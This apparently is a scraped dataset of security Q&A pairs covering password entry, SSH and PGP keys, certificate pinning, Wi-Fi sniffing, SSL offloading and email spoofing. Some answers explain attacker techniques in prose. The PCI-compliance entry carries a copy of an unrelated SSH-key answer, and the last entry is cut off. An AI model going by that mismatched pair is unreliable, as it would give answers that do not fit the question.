source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
29,598
Should sensitive data ever be passed via the query string as opposed to the POST request? I realize that the query string will be encrypted , but are there other reasons to avoid passing data in the query string, such as shoulder surfing?
If the query string is the target of a user-clickable link (as opposed to a URL used from some Javascript), then it will appear in the URL bar of the browser when the corresponding page is loaded. It has the following issues: The URL will be displayed. Shoulder surfers may see it and learn things from that (e.g. a password). The user may bookmark it. This can be a feature; but it also means that the data gets written on the disk. Similarly, the URL will make it to the "history" so it will be written to disk anyway; and it might be retrieved afterwards. For instance, if the browser is Chrome, then a lunch-time attacker just has to type Ctrl+H to open the "history tab" and obtain all the query strings. If page is printed, the URL will be printed, including any sensitive information. URLs including query strings are also frequently logged on the web server, and those logs may not be secured appropriately. There are size limitations on the query string, which depend on the browser and the server (there is nothing really standard here, but expect trouble beyond about 4 kB). Therefore, if the query string is a simple link target in an HTML page, then sensitive data should be transmitted as part of a POST form, not encoded in the URL itself. With programmatic downloads (the AJAX way), this is much less of an issue.
{ "source": [ "https://security.stackexchange.com/questions/29598", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1678/" ] }
29,642
Background I'm in charge of auditing a medium-scale web application. I have audited web applications several times before, but I've always written a short PDF quickly explaining what I encountered and usually I'm the one who's gonna be fixing those vulnerabilities so I never cared for the actual content of the report. In my current job things are done in a more organized fashion. First I have to write the report, then the project manager will review it, then he'll decide whether I'll be the one to fix the issues or someone else. Question What should such report contain? I'm looking for a general outline of how it should be organized. Update : Because I couldn't find anything here on Security.SE about audit reports, I decided to make this question a bit broader and include any kind of security audit rather than just web applications. I think it'll be useful to more people in this case.
There's a couple of ways that I've seen this done, each has it's pros and cons. As noted by @RoryAlsop below a common point for both approaches is that the executive summary should, as much as possible, be written for a business audience (assuming that it's a test you're doing for a 3rd party or the report will be passed to management). Reporting by finding. Here you list the findings, usually ranked by severity (e.g. CVSS score or some other scale like severity/likelihood). You then list out the technical details of the finding and potential mitigations if you have that information. This kind of report gets to the point quite quickly and plays well with tool output. Reporting by methodology. Assuming here that you're following a defined testing methodology, the report is structured along the lines of the methodology and includes a section for each area of the review. The sections detail what testing was done and the outcome (e.g. either a finding or the fact that there was no finding in this section). The advantage here is that you're showing your workings and that someone reading the report can get a good idea that you've actually tested something and it was ok rather than you just having missed it out. The downside is that it tends to be a longer report and harder to automate. One other gotcha is that you need to make sure that the testers don't just follow the methodology and they actually engage brain to look for other things. In terms of format for the findings, I usually include the following Title (descriptive gets used in the table and linked to the detail) Description - technical description of what the issue is and importantly under what circumstances it is likely to cause a security issue (e.g. for Cross-Site Scripting one of the potential issues is use to grab session tokens which could allow an attacker to get unauthorised access to the application) Recommendations - How the issue should be resolved, where possible include specific details on vendor guidance to fix it (e.g. things like removing web server versions from headers have specific instructions for Apache/IIS etc) References - Any links to additional information that's relevant to the finding (e.g. links to the relevant OWASP page for Web app. issues) Severity. As I mentioned above this could be CVSS or something more general like High/Medium/Low based on impact and likelihood. Other classification as needed by the client. For instance some client might need things lined up against a standard or policy or something like OWASP Top 10. One other point to make is that if your do a lot of tests it's well worth having a database of previous findings to avoid having to look up references repeatedly and to make sure that severities are consistent.
{ "source": [ "https://security.stackexchange.com/questions/29642", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16228/" ] }
29,742
I just saw for the first time a new way to enter a password, at the Banque Postale (French Bank). You are given a virtual numeric keyboard and to type you can just leave the mouse cursor over a number for what seems like 1 second for it to be entered. At first this seems pretty nice, you don't have keyboard strokes to record, nor mouse clicks. Yet, I have the uncanny impression that there might be a problem with this system. The obvious one is that you are only allowed to put numbers in your password, would there be anything else?
These kinds of password entry systems are only good as long as the attackers do not adapt. It is a play in several acts: Bank Web sites use passwords which are entered the traditional way, with a keyboard. Key loggers appear, and harvest key strokes. After some cases of actual bank password theft, banks adapt. They implement "visual keyboards" in which the user clicks on some buttons which are labeled with letters or digits. After some time, attackers adapt. New-generation key loggers also record mouse click coordinates. These coordinates are sufficient to recompute the password. After some time, banks adapt. They now "shuffle" the labeled buttons so that they do not always show up on the same emplacement on the screen. Mouse click coordinates are no longer sufficient to recompute the password. After some time, attackers adapt. Next generation key loggers now take local screen shots, recording the pixels which are around the point where the user clicked. The screen shots are sufficient to recompute the password. After some time, banks adapt. Instead of clicks , the bank's Web site will react to some "hovering" without an actual click. The current key logger generation does not record "hovering", only clicks, so they are defeated. As you observe, we are currently at that point. Can you guess what is going to happen ? This is an arms race. The attackers force the banks to apply more convoluted password entry methods. The banks train attackers into defeating increasingly "secure" password entry methods. Simultaneously, banks try to train their customers into dealing with more complex password entry methods. In the long term, my bet is that attackers will evolve faster than customers; the banks fight a losing battle.
{ "source": [ "https://security.stackexchange.com/questions/29742", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2976/" ] }
29,772
.onion addresses normally should be made of a base32 string of the first 80 bits of the SHA1 hash of the private key of the server (see .onion address specification ). Today I ran into a service which clearly doesn't have an arbitrary address: http://sms4tor3vcr2geip.onion/ How does that work and is it secure?
Shallot is an older program, there are newer alternatives available now: Scallion - uses GPU hashing, needs .NET or Mono: http://github.com/lachesis/scallion Eschalot - uses wordlist search, needs Unix or Linux: http://blacksunhq56imku.onion Eschalot can find longer human-readable names like seedneedgoldcf6m.onion, hostbathdarkviph.onion, etc. The performance chart quoted above is a bit obsolete now, 8-10 character long .onions are easy enough to find. There was a discussion back in the day, when shallot first surfaced, about whether custom names for hidden services are bad or not. Problem number one: generated keys have a much larger public exponent than the standard keys produced by TOR, which puts a somewhat higher load on the TOR relays. Answer: it was concluded that the difference is negligible compared to the other encryption tasks the relays perform constantly. In eschalot, the largest public exponent is limited to 4294967295 (4 bytes). Problem number two: TOR developers can decide to filter and block all the custom names. Answer: yes, they can, but they have not yet and there is really no reason for them to do so. They can just as easily change the standard for the random names too and cause chaos and mass exodus on the network. Problem number three: generated names are easily spoofed, since the visitor clicking on a link somewhere out there can be tricked by the seemingly right .onion prefix without checking the whole thing. To demonstrate, which one is the real SilkRoad? silkroada7bc3kld.onion silkroadqksl72eb.onion silkroadcqgi4von.onion silkroady3c2vzwt.onion silkroadf3drdfun.onion silkroadbdcmw7rj.onion Answer: neither, I generated all of them to demonstrate the problem. If you recognized that those were all fakes, you probably spend more time on the SilkRoad than I care to know about :). To be fair, completely random addresses are even worse - if somebody edits one of the onion links wikis and replaces one random address with another, the casual visitor using that wiki would not know the difference. Solution: it's essentially up to the person to pay attention which site he is really visiting, but the site owner can create a human readable address that is easier to remember, even if it's a completely random gibberish. As long as it's long and easy to memorize and identify. Some examples: fledarmyusertvmu.onion wifefeelkillwovk.onion ladyfirehikehs66.onion woodcubabitenem2.onion I did not spend the time to intentionally generate good names, just picked some from the list I had left after testing eschalot. With a (very) large wordlist, unique looking names are easy to generate, but it will take time to go through the results and manually locate the ones that are decent. Well, that was my opinion and it could be wrong. -- Hiro
{ "source": [ "https://security.stackexchange.com/questions/29772", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
29,806
Every once in a while I have to set up an account on a site that, while apparently at least not storing my password in plaintext, still force me to choose from a limited set of security questions that can be used for password recovery purposes. Since the questions are usually moronically easy to answer by some googling or social engineering (à la "What's you mother's maiden name?") what is the correct approach when I cannot avoid using this account?
"Security questions" are just an alternative password which is not used often, but which, presumably, will not be forgotten by the user. Since it is a password-equivalent information, treat it as such: use true, high-entropy passwords as answers to security questions. Of course, since you will not enter these often, you should write them down on a paper, stored in a safe place (they are meant to be used as a backup for the "true" password; you do not need them often). (Note: most systems will handle responses to security questions in a case-insensitive way, which decreases the "entropy" of that password -- hence, make it even more random. 15 random letters would be enough.)
{ "source": [ "https://security.stackexchange.com/questions/29806", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
29,851
I am learning how to use OpenPGP keys in GnuPG, and I am wondering what is the threshold people generally use to maintain separate OpenPGP keys. Maintaining an incredibly large number of keys is not good since it makes it difficult to be trusted by others. On the other hand, my feeling is, maintaining a single key may not be able to keep separate things separate. How many keys are okay? How many are too much?
In general, one key per identity should be fine. One key can include: Several UIDs (for separate mail addresses, ...) Several subkeys (for different devices, so you can put some subkey on your mobile; if it gets lost, revoke only this) Advantages Less hassle when signing keys, interacting with keyservers, cross-signing your keys Less hassle maintaining your keys including moving to other computers, revocation certificates, ... Less hassle when actually using it Less pollution: If somebody wants to use your public key, it's easier to find the correct one as they're grouped in a semantic way. Imagine looking for a person's name and finding a dozen keys for all his different addresses in use, which to use for encryption? On having multiple keys anyway If you want to manage multiple IDs which shall not be connected directly (I can imagine a personal one, one at your employer, one for stuff which may not contain your real name - I think of governmental pressure, ...), feel of course free to use multiple primary keys. Limitations of Subkeys Others encrypting for you will always choose the newest subkey. There is no way to connect subkeys to specific user IDs (for example, to have different subkeys for work and home). This would be a good reason for using multiple primary keys (also, your employer might be able to require the private key, depending on your local legislation). This is not valid for signing subkeys: each computer will just use the subkey that is available; if you only distribute the specific subkey, you can easily enforce a given subkey. GnuPG can only merge different sets of private subkeys for a primary key starting from version 2.1. Make sure to have all subkeys on a single machine and export as needed, or upgrade GnuPG. There is a way using gpgsplit and cat , but it is tedious and requires deep knowledge of RFC4880 (the OpenPGP specification). Creating and Exporting Subkeys Subkeys are generated by running gpg --edit-key [key-id] for the primary key, and then starting the subkey generation assistant with the addkey command (don't forget to save afterwards). To export a subkey (or set of subkeys), run gpg --export-secret-subkeys [subkey-id]! >subkey.pgp -- do not forget the exclamation mark ! , otherwise GnuPG will resolve the subkey to the associated primary key (and export this one instead). You can import it using the normal gpg --import [file] command. I strongly recommend Debian's document on subkeys for further reading.
{ "source": [ "https://security.stackexchange.com/questions/29851", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
29,876
I have learned there are 2 methods to make SSH remote login easier and secure , those are; ssh generated keys (using ssh-keygen) OpenSSH Keys PEM (.pem) keys usually generated with OpenSSL (Amazon Web Services uses this method) OpenSSL my question is that what are the differences of these 2 methods which one is more secure and why is it more secure ?
The file format is different but they both encode the same kind of keys. Moreover, they are both generated with the same code: openssl (the command-line tool) is a wrapper around OpenSSL (the library), and OpenSSH actually uses OpenSSL (the library) for its cryptographic operations, including key pair generation. So there is no direct security difference. We could argue a bit about password-based encryption of the private keys, but there is nothing really significant here.
{ "source": [ "https://security.stackexchange.com/questions/29876", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20155/" ] }
29,885
The company I'm working for is about the undergo PCI compliance onsite assessment. The PCI DSS has a kind of checklist, but it is all very vague and abstract to me. So I'm not quite sure what I need to have prepared for the QSA, when he comes. More specifically, I'd like to know what exactly the QSA asks for in terms of documents, software, configuration files, scripts etc. In the case of documents, how detailed should the information be? Just general guidelines or specific procedures for each item? For example, is it acceptable to write only something like this on my policy document? Procedures must include periodic media inventories in order to validate the effectiveness of these controls. Or should I provide details about what these procedures are, who will perform them, how long is the mentioned period, etc?
The file format is different but they both encode the same kind of keys. Moreover, they are both generated with the same code: openssl (the command-line tool) is a wrapper around OpenSSL (the library), and OpenSSH actually uses OpenSSL (the library) for its cryptographic operations, including key pair generation. So there is no direct security difference. We could argue a bit about password-based encryption of the private keys, but there is nothing really significant here.
{ "source": [ "https://security.stackexchange.com/questions/29885", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20152/" ] }
29,951
Most of discussions involving access credentials include references to "hashing salted passwords". Is this another way to referring to the HMAC algorithm or a totally different operation? Different or not, why not using HMAC since this is easily referenced to a published standard -FIPS198?
HMAC is a Message Authentication Code , which is meant for verifying integrity . This is a totally different kind of beast. However, it so happens that HMAC is built over hash functions, and can be considered as a "keyed hash" -- a hash function with a key . A key is not a salt (keys are secret, salts are not). But the unique characteristics of HMAC make it a reasonable building block for other functions, which is what happens in PBKDF2 : that's a key derivation function, commonly subverted into password hashing (a role for which it appears to be adequate). PBKDF2 includes a salt , and internally invokes HMAC (several times). Good password hashing must be slow (in a configurable way) and include a salt . These characteristics are not easily obtained, and you will not get them out of a lone HMAC (which is fast and does not use a salt).
{ "source": [ "https://security.stackexchange.com/questions/29951", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10923/" ] }
29,988
I'm superficially familiar with SSL and what certs do. Recently I saw some discussion on cert pinning but there wasn't a definition. A DDG search didn't turn up anything useful. What is certificate pinning?
Typically certificates are validated by checking the signature hierarchy; MyCert is signed by IntermediateCert which is signed by RootCert , and RootCert is listed in my computer's "certificates to trust" store. Certificate Pinning was where you ignore that whole thing, and say trust this certificate only or perhaps trust only certificates signed by this certificate , ignoring all the other root CAs that could otherwise be trust anchors. It was frequently also known as Key Pinning, since it was actually the public key hash that got saved. But in practice, Key Pinning turned out to cause more problems than it solved. It was frequently misconfigured by site owners, plus in the event of a site compromise, attackers could maliciously pin a cert that the site owner didn't control. Key Pinning was deprecated in 2017, and was removed entirely from Chrome and Firefox in Nov. 2019. It was never supported to begin with by IE and Safari. The recommended replacement is to use the Expect-CT header to tell browsers to require that the cert show up in Certificate Transparency logs.
{ "source": [ "https://security.stackexchange.com/questions/29988", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56974/" ] }
30,091
I realize this question may be quite broad (and hopefully not a violation of the FAQs), but I'm interested in hearing how many of you handle a computer infected with Malware. In a small-to-medium business (heck, even large businesses like the New York Times ), acquiring malware seems like an inevitability. Despite putting checks and balances in-place (updated workstations with security patches/java/flash, up-to-date anti-virus software, spam filters, etc.), viruses still penetrate through the cracks and some are able to execute. My question is not so much about the prevention of viruses, but rather what you do with that workstation after it's been discovered that it has been compromised. Obviously we'd all feel more comfortable with the old NIFO stance, however many of us are strapped for resources and don't have time to always be re-imaging machines — especially if the bugs show only with "on-demand scans" and don't appear to have executed. I'm curious as to what others in my situation are doing once a machine is found to be compromised. Is a "revert to old restore point and on-demand scan in safe mode" enough, or do you guys always re-image a machine?
Nuke it from orbit. The only way to be sure it is gone once it is compromised is to blow it away entirely. Restore checkpoints only help for configuration issues, a virus can alter the previous configurations or install itself in such a way it survives a restore. If it's just adware, then removal may be sufficient, but viruses can be very sneaky. It might be possible to get rid of it completely, but it will take more time (days) than nuking and rebuilding in most cases, particularly if regular backups are kept. Edit: As Oleg was kind enough to point out. If your re-imaging from a hidden partition on the computer, it is possible that the image could have also been infected. It's also possible that the BIOS (or other firmware in hardware) could have been infected in very rare cases, in which case you are looking at a major pita to get rid of it. Luckily 99.99%(my approximation) of the time, it isn't hardware resident yet.
{ "source": [ "https://security.stackexchange.com/questions/30091", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4386/" ] }
30,149
Sometimes i need to use a public pc to access my gmail account, is there a safe way to login and keep my password safe in case there was a keylogger or a trojan on that pc? are there tools that could help in that case?
Enable two factor authentication . Consider the remembered password compromised to any user of the public computer. EDIT: My answer dealt with how to prevent your password from being keylogged. With two-factor authentication your password is now the combination of a randomly generated one-time use code (obtained via cell phone or pre-obtained list) as well as the remembered password; hence a keylogger doesn't give an attacker the ability to log in as you for a future attack. However, I definitely agree with TomLeek and Nic that in a real-time attack (not a keylogger looked at after the fact) that captures your random session token (that indicates to gmail you are signed in before you do any action), an attacker can fully use your gmail account (send emails as you; search through emails sent to you; delete your emails; etc). Granted, once you logout your session token will become invalidated and will kick them out of your account. Granted a clever attacker could write a browser plugin to collect your session tokens, send it to them, and then redirect the logout page to not actually invalidate your token. Though you could always login to gmail again, view the link for "Last account activity [Details]" and sign everyone else out.
{ "source": [ "https://security.stackexchange.com/questions/30149", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20309/" ] }
30,246
Several times I get a phone call from a company- my bank, utility companies etc. Many times they are just cold calling me, but once or twice they were calling for legitimate reasons (ie, something to do with my account). The problem is, all these companies ask you to confirm your personal details, like date of birth. Now I have no way of knowing if the person calling me is the real company, or some phisher (because even if the call isn't from a blocked number, it's just a number and I have no way of knowing who owns it). Usually, when they ask me to ask for personal details to prove my identity, I tell them since they called, they should prove their identity. At this point they usually get irate and warn me they cannot go ahead for security reasons. Now I don't want to miss out on important calls, but neither do I want to give out my personal info to anyone who manages to find my phone number. Is there a proper way to deal with such calls?
I react exactly the same as you- I first ask them to authenticate themselves to me, after all, they called me. If they can't or won't I tell them that I will call my bank manager/utility rep/whatever and that if this is an official message I should be able to receive it after authenticating the usual way. Don't give in to them- they need motivation to start doing this right.
{ "source": [ "https://security.stackexchange.com/questions/30246", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20368/" ] }
30,261
If someone knows my wifi password (be it WEP or WPA) what can they see? Do they just see URLs I visit, or can they see everything in my browser, or even everything I do on my computer? Does using HTTPS make any difference? Secondly, If the attacker does not live nearby, is it possible for them to set up a laptop in my neighbour's house and record all my traffic or otherwise relay the data via the web?
If someone knows my wifi password (be it WEP or WPA) what can they see on my screen? Do they just see URLs I visit, or can they see everything in my browser,....or can they see everything I do on my computer? Does using HTTPS make any difference? They can't see anything on your screen (unless you've enabled some sort of unencrypted remote desktop screen sharing program). They can, however, observe all the data being sent to and from your computer (I'm assuming for WPA/WPA2 they observed the 4-way handshake at the beginning of each session; or trivially forced your computer to start another handshake), unless you encrypted that data using a protocol like HTTPS. They would typically run a packet capture program like wireshark to decrypt the wifi encryption. Again, they'd be able to see what HTTP webpages you requested, what links you click, the HTML content of the webpages you requested, any information you post to a web site, as well as all data (e.g., any images/movies) sent to you or by you. They can also interfere with the traffic being sent to you (e.g., alter the content you see). Granted anyone nearby can always interfere and cause denial of wifi service without knowing your password (e.g., often turning on a microwave oven will interfere with all wifi traffic being sent to you). Or have their own computer/router that they fully control that sends impersonated messages as you or your router. If you visit HTTPS sites only, they can't decrypt the data (unless they have somehow additionally compromised your computer). However, even with HTTPS they can see what IP addresses you are sending/getting data from (which usually will let them tell what domain e.g. if you went to 69.59.197.21 it's stackexchange.com ). They also will know when and how much encrypted data is being sent. This is possibly enough to give away private information. Imagine you went to a webpage via HTTPS that had results of your HIV test, and an eavesdropper was listening. If the web page for a negative result showed 3 images (of specific sizes) and a 10 MB PDF file on safe sex, while the page for positive results had 15 images and three PDF files that were 8MB, 15MB, and 25 MB respectively you may be able to figure out what their results were by observing how much data was sent and when. This style of attack has been used to figure out what people were searching for on a popular search engine (from the instant results provided for different queries) or roughly estimate what kind of income someone had at an https tax site. See Side-Channel Leaks in Web Applications (pdf) . Granted all this information is also available to your ISP as well and to every intermediary router between your computer and the server you are trying to visit. Secondly, if the attacker does NOT live nearby, is it possible for them to set up a laptop in my neighbours house for example, and programatically record all my traffic...or alternatively can they relay the data from the laptop to their own computer elsewhere, via the web? Either is trivial to program up assuming your neighbor doesn't mind them putting a laptop in their house (or they found a power source and place to hide their computer).
{ "source": [ "https://security.stackexchange.com/questions/30261", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20378/" ] }
30,310
I've found out that if you download a file with Firefox, a similar window as this one pops up (in dutch in my case): ("Bestand opslaan" = "Save file") However, the file is already being downloaded before I press the Ok button (i.e. I waited 1 minute before clicking on the Ok button and already 50Mb of 191Mb was downloaded). Does this feature come with any security risks (a malicious file could be downloaded before I even had the chance to click Cancel ) and should I find a way to disable it or is this perfectly safe?
Technically, the popup does not ask you whether you really want to download the file; that decision, you already took when you clicked on the link which triggered the download. The popup asks you what Firefox should do with the file when it has been fully downloaded. Potentially hostile files can be a security issue. Filesystems normally store files as bunch of bytes and are thus nominally immune to the file contents ; but modern operating systems are not content with handling files as files. For instance, if you open a file explorer to see the directory in which downloaded files are stored, and the file has a name which ends in '.jpg' or '.png', then the file explorer will try to interpret the file contents automatically, as a picture, so as to compute and display a miniature view of the said picture. Any security hole in the JPEG or PNG support library could then be exploited by a malicious file, and it does not require any "opening click" on the file, just opening the directory . The Web is a harsh place.
{ "source": [ "https://security.stackexchange.com/questions/30310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10817/" ] }
30,362
Most antiviruses have hundreds of thousands or even millions of malware signatures and yet they scan many files in a reasonable short time with high detection rates. Even real-time scanners doesn't slow computer noticeably but provide strong protection against threats. How can scanners achieve this kind of performance? I know it could be a broad question but I wanted to get a general idea about this.
Antivirus detection is a feature extraction and a classification problem . A great analogy is the 20 questions game where the goal is to identify an arbitrary object by asking 20 seemingly unrelated yes/no questions. The idea behind the game is that each answer would eliminate half of the objects so it is theoretically possible to describe 2^20 (1,048,576) objects with only 20 binary features. A different analogy is how the visual cortex processes visual information. The brain has very simple and fast hardware for detecting and classifying an infinite number of images. Only six layers of neurons (the number of neurons is estimated at 140 million) are used to extract progressively more complex features and pass them on to the next layer. The layers interact back and forward to each other to produce abstract notions that can be verified against memory. Antivirus engines store many features of known malware in the definition file and when they scan a new file they optimize the extraction and classification (matching) of those features. Storing features also makes the detection more robust so that small changes in a piece of malware won't thwart detection. Feature extraction is also done in parallel so that resources are fully utilized. Most features are designed by humans but there are some that do not make sense by themselves, like having a null byte at the end of the file or a ratio between file size and printable text size. Those nonsensical or unintuitive features are randomly generated and tested by data mining vast quantities of files. In the end the file is described and classified by the combination of features. As a side note, the best predictor for questions being closed on Stack Exchange is whether the first letter of the question is in lower case. So when a new file is scanned, it is quickly classified into finer and finer categories and then it is matched against a small set of signatures. Each step would exclude a large number of clean files and would dictate what other features should be extracted next. The first steps are very small in terms of computing resources but they dictate which more expensive steps should be taken later. By using only a few disk reads and CPU cycles the engine can determine the file type. Let's say it is a JAR file. Using this information, it starts collecting features of the JAR file. If it's signed, then the scan is aborted. If it's not importing any functions then the scan is aborted (I'm oversimplifying here). Is it using any tricky functionality? then more features should be extracted. Does it use known vulnerable functions? Then it should be thoroughly checked for known Java exploit signatures. On-access scanning has the same principle behind but it also works like a gatekeeper. So each action (usually API call) taken by a process is being checked for and allowed or denied. Similarly, each suspicious action triggers more filters and more checks. During the checks the process or thread is waiting for the operation to complete but sometimes the whole process is actively suspended. This might look like significant overhead but once a specific action is verified, it is later cached and performed very quickly or not performed at all. The result is a performance degradation similar to having a machine a couple of percentage points slower. Check the PCMark scores for 20 AV products here . So the speed optimization comes from very little work being performed on clean looking files which constitute the overwhelming majority of scanned files. The heavy lifting work is being done only on suspicious malware-looking files for which AV might even take seconds to emulate the process or even send it to the cloud for analysis. The magic is in the progressive classification.
{ "source": [ "https://security.stackexchange.com/questions/30362", "https://security.stackexchange.com", "https://security.stackexchange.com/users/8396/" ] }
30,396
I do not mean simply putting the public RSA key of a x.509 certificate into ~/.ssh/authorized_keys - I'm looking for a way to set up a ssh such that x.509 certificates signed by a pre-defined CA will automatically be granted access to the linked user account. RFC 6187 seems to suggest such a functionality, but I can't find any documentation on this, or whether it is implemented in OpenSSH at all. Here's a more elaborate description of what I want to do: A CA ("SSH-CA") is set up This CA is used to sign user certificates with keyUsage=digitalSignature (and maybe the id-kp-secureShellClient extendedKeyUsage field) This certificate can now be used to log in on a server. The server does not require the public key being present in the authorized_keys . Instead, it is set up to trust the SSH-CA to verify the public key and signature of the certificate (or certificate chain) and the username/UID (probably directly in the subjectAltName field, or maybe using some server-side mapping) before the usual RSA authentication takes place So, (how) can this be achieved with OpenSSH, and if it requires a patch how can client-side modifications be kept minimal? As an alternative I guess one could also use any S/MIME certificate plus a username to email-address mapping, without requiring an own CA. The client could also still use only the private RSA key and a certificate server is used obtain a certificate from a public key, additionally offering the possibility to use PGP certificates as well (e.g. via monkeysphere ) without the user requiring any knowledge about all this as long as they simply provide a public key. If it's not natively possible, I guess I could come up with a semi-automatic "implementation" of this by letting a script on the server automatically check a somehow else submitted certificate via openssl (or gnupg ) and have the public key be put to the respective user's authorized_keys file - although at that point I am probably more or less re-doing the monkeyshere project ...
OpenSSH does not officially support x.509 certificate based authentication: The developers have maintained a stance that the complexity of X.509 certificates introduces an unacceptable attack surface for sshd. Instead, they have [recently] implemented an alternative certificate format which is much simpler to parse and thus introduces less risk. ... OpenSSH just uses the low-level cryptographic algorithms from OpenSSL. However Roumen Petrov publishes OpenSSH builds that do include X.509 support , and you could try with those. X.509 certificates can [be] used as "user identity" and/or "host key" in SSH "Public Key" and "Host-Based" authentications. Roumen Petrov's builds can be downloaded via this page . Here's a Debian how-to for SSH with authentication key instead of password that might also prove useful in setting up your OpenSSH to accept x509 PKI for user authentication.
{ "source": [ "https://security.stackexchange.com/questions/30396", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
30,403
When hosting a cluster of web application servers it’s common to have a reverse proxy (HAProxy, Nginx, F5, etc.) in between the cluster and the public internet to load balance traffic among app servers. In order to perform deep packet inspection, SSL must be terminated at the load balancer (or earlier), but traffic between the load balancer and the app servers would be unencrypted. Wouldn't early termination of SSL leave the app servers vulnerable to packet sniffing or ARP poisoning? Should SSL be offloaded? If so, how can it be done without compromising the integrity of the data being served? My main concern is for a web application where message layer encryption isn't an option.
It seems to me the question is "do you trust your own datacenter". In other words, it seems like you're trying to finely draw the line where the untrusted networks lie, and the trust begins. In my opinion, SSL/TLS trust should terminate at the SSL offloading device since the department that manages that device often also manages the networking and infrastructure. There is a certain amount of contractual trust there. There is no point of encrypting data at a downstream server since the same people who are supporting the network usually have access to this as well. (with the possible exception in multi-tenant environments, or unique business requirements that require deeper segmentation). A second reason SSL should terminate at the load balancer is because it offers a centralized place to correct SSL attacks such as CRIME or BEAST . If SSL is terminated at a variety of web servers, running on different OS's you're more likely to run into problems due to the additional complexity . Keep it simple, and you'll have fewer problems in the long run. That being said Yes, terminate at the load balancer and SSL offload there. Keep it simple. The Citrix Netscaler load balancer (for example) can deny insecure access to a URL. This policy logic, combined with the features of TLS should ensure your data remains confidential and tamper-free (given that I properly understand your requirement of integrity) Edit: It's possible (and common) to Outsource the load balancer (Amazon, Microsoft, etc) Use a 3rd party CDN (Akamai, Amazon, Microsoft, etc) Or use a 3rd party proxy to prevent DoS attacks ... where traffic from that 3rd party would be sent to your servers over network links you don't manage. Therefore may not trust those unencrypted links. In that case you should re-encrypt the data, or at the very least have all of that data travel through a point-point VPN. Microsoft does offer such a VPN product and allows for secure outsourcing of the perimeter.
{ "source": [ "https://security.stackexchange.com/questions/30403", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20470/" ] }
30,410
Without being a programmer or a computer expert, how can I know if a particular program or any piece of software in general doesn't have hidden unwanted functions compromising privacy and security?
You can know whether some software does only what it announces in the same way that you can know whether the food they serve you at restaurants is poisoned or not. In plain words, you cannot, but Society has come up with various schemes to cope with the issue: You can listen to friends and critics to know if the food at a given restaurant has good reputation or not. You can take a sample and send it to a lab which will look for many (but not all) known poisonous substances. You can ask nicely if you may observe the cook while he prepares the dishes. The cook has a vested business interest in his customer being happy with the food quality, and happiness includes, in particular, not being dead. Society punishes poisoners with the utmost severity and it can usually be assumed that the cook knows it. You always have the extreme option of not eating there if you are too worried. All of these can be directly transposed into the world of software. Extreme methods of ascertaining software quality and adherence to its published behaviour include very expensive and boring things like Common Criteria which boil down to, basically, knowing who made the program and with what tools. Alternative answer: every piece of software has bugs, so it is 100% guaranteed that it does not do exactly what it is supposed to do. (This assertion includes the software which runs in the dozen or so small computers which are embedded in your car, by the way.)
{ "source": [ "https://security.stackexchange.com/questions/30410", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20474/" ] }
30,654
Pretty straightforward - So we use rainbow tables to get passwords of users out of hashes. So why won't Microsoft implement salt on the passwords in Windows to be hash(password+salt) ? Won't this implementation save a lot of grief, at least while implemented on the SAM file when dealing with password cracking of local users?
The handling of passwords in a Microsoft OS is complex because they use passwords for many usages. The OS (or its domain controller) will store a hashed version of the password, but there are also values which are symmetrically encrypted with keys derived from the password or from the hash thereof. The authentication protocols do not include provisions for exchanging salts when some hashing must occur client side. It is difficult to alter the password processing algorithms without impacting a lot of subsystems and potentially breaking the backward compatibility, which is the driving force of the Windows ecosystem. It goes down to strategic priorities. Microsoft knows that altering password hashing and authentication protocols to include a salt will have some non-negligible costs which they would have to assume (by fixing all the components which are thus affected). On the other hand, not changing the password hashing is rather "free" for them, because a flaky hashing algorithm will not convince customers to switch to other non-Microsoft systems (the OS market is, in practice, a captive market ); it takes a lot more to force potential customers to envision an OS switch which is very expensive. Also, password hashing can arguably be qualified as "defence in depth" , a second layer which has any impact only once a breach already occurred; as such, it could be presented as being of secondary importance. Therefore, it is logical, if irritating, that Microsoft does not update its poor password processing practices. Historically, Microsoft did only one update, when they switched from NTLM v1 to v2, and it was kind of necessary because the older LM hash was so weak that it was beginning to be embarrassing . My guess is that it involved a lot of internal hassle and they are not eager to do it again.
{ "source": [ "https://security.stackexchange.com/questions/30654", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6004/" ] }
30,732
With so many popular e-mail providers forcing users to log on using their SMTP servers, why is it still possible to forge "From: " header in e-mails? What prevents users from simply discarding the e-mails in which the source domain of the sender doesn't match the domain of SMTP server?
tl;dr It's very easy to spoof a domain even with SPF controls enabled. The solution is to use DKIM + DMARC , or SPF + DMARC The email client is responsible for telling you if the message passes DMARC Display From verification The email protocol allows for legitimate spoofing using Resent-* headers and Sender headers. The email client (MUA) should display this exception whenever it exists. There are a few misconceptions about SPF, namely: SPF does not prevent email spoofing. SPF alone doesn't affect, influence or, control the RFC 2822 Display From . By default, the usefulness of SPF is to prevent backscatter issues and very simple spoofing scenarios. Microsoft attempted to solve this issue with SenderID, (making SPF apply to the Display From address) but it was too complicated and didn't really solve the whole problem. Some background First know that there are two "from" addresses and two "to" addresses in every SMTP message. One is known as the RFC2821 Envelope, the other is the RFC2822 Message. They serve different purposes The Envelope: (RFC2821) The envelope is metadata that doesn't appear in the SMTP header. It disappears when the message goes to the next MTA. The RCPT From: is where the NDRs will go. If a message is coming from Postmaster or a remailer service this is usually <> or [email protected] . It's interesting to see that salesforce uses this similar to constantContact as a key in a database like [email protected] to see if the message bounced. The RCPT TO: is who the message is actually being sent to. It is used for "to" and "bcc" users alike. This doesn't usually affect the "display of addresses" in the mail client, but there are 